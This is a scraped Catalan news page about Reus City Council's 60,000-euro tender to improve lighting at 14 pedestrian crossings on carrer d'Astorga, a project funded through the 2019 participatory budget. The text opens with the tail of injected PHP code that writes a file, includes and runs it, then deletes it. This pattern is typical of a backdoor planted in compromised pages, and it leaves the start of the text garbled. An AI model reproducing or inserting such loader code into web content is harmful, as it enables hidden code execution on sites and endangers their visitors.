");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> L'Ajuntament de Reus millorarà la il·luminació de 14 passos de vianants del carrer d'Astorga
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

L'Ajuntament de Reus millorarà la il·luminació de 14 passos de vianants del carrer d'Astorga (03/06/2020)

L'Ajuntament de Reus ha publicat al perfil del contractant la licitació del contracte d'obres que ha de permetre millorar la seguretat del trànsit del carrer d'Astorga, amb la iŀluminació de 14 passos de vianants d'aquest vial. El contracte surt a concurs públic amb un pressupost de licitació de 60.000 euros, i és fruit d'una proposta ciutadana als Pressupostos Participatius 2019, que convoca la regidoria de Participació, Bon Govern i Serveis Generals.

Les obres, que gestionarà la regidoria de Desenvolupament Urbà i Via Pública, preveuen reforçar la iŀluminació dels passos a vianants, per tal de garantir la seguretat de les persones que vulguin travessar el carrer, donat que en aquests passos no hi ha senyalització semafòrica. Concretament, s'actuarà en 14 passos de vianants, 2 d'ells dobles.

El nou enllumenat estarà format pels fanals i projectors, i també s'’instaŀlarà un senyal de trànsit amb leds que han d'ajudar a captar l’atenció dels conductors i contribuir a la seguretat i pacificació del trànsit.

La licitació del contracte tanca el termini de presentació d'ofertes l'11 de juny, i fixa un termini d'execució de les obres de 2 mesos i 15 dies.

La millora de la iŀluminació del carrer d'Astorga va ser una de les propostes que va rebre més suports en la votació del Pressupostos Participatius 2019 en l'apartat de grans projectes (de més de 50.000 euros de pressupost), i va ser presentada per M. J. Ariza. La proposta va obtenir un total de 236 vots.

El Pressupostos Participatius 2019 han estat la segona convocatòria de l'Ajuntament a la ciutadania de Reus a decidir en què s'inverteixen 750.000 euros del pressupost municipal.

Font: Ajuntament de Reus

L'Ajuntament de Reus millorarà la il·luminació de 14 passos de vianants del carrer d'Astorga

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona